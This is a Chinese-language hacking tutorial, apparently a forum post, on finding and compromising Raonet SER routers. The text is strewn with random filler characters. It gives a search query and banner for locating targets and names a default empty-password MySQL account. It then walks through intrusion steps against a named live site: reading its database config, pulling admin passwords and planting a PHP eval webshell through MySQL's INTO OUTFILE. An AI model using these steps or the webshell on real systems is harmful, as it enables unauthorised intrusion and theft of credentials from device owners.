寻找存在漏洞的路由器方法:
- k+ ~7 E8 z! ^8 x# ^
: A+ ?9 @; M6 K7 a" x* z; R9 S1:google搜索'Raonet Subscriber Ethernet Router'
: @( E2 k: U' K0 v% k) ]0 `* U0 M$ p' P, ]3 n
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001$ x, P- t: V8 Q6 @: r% x2 [
( q5 P% l! @& L- ]" X% I. Y3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。5 w8 ^* D' _7 a/ {4 d
" C. L; b# v3 v a7 M/ u: t
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
9 v0 X/ ~4 h+ [& l
& \2 X6 B5 G, ^ / u. p' ?8 w$ Y4 q8 E) P6 P
x; T' h, W- P3 W; [入侵步骤:4 ~6 T% R9 u% @- }7 M( k& h8 F& Y
7 f( d5 O+ K! R6 w0 x- r! v
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
F7 W+ u% w3 y3 c+ b% E3 R" l
* m# l( N+ I5 r% G% L$ `: W2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
9 d* s4 W8 ~2 N& e! a6 W# R7 I3:得到密码后连接,查看GUI管理密码:6 F" ]- F/ u3 D" x' v3 A
use ser_500
" Q# V* ?& p( o/ R9 i& k# t0 h3 Gselect id,passwd from user;! A0 V0 s3 k# ?+ l
4:通过数据库写入webshell,执行命令:
2 [9 D6 n5 @; X' ]5 `; Iuse mysql;
+ A8 }. [; w, k8 | X6 C# W! \/ _create table ok(cmd TEXT);8 Z) r: V8 N* Q4 S% z
insert into ok values("<?php @eval($_POST[cmd])?>");
% b, {, Z$ ?' h+ x! q+ lselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
8 B* n0 l2 E. H fdrop table ok;
; c; [0 L# |( u' J2 g# c/ J5 n4 J- [- A& o9 @
5:连接后门shell.php 7 n, C* i3 N/ Z1 C- k2 M1 i
, t% |' Q# c* l ]: C4 p' E( j6. 搞定!
8 M/ b, S8 ], K) s. u# r M- i& l0 M! K6 R+ `6 y* ^
|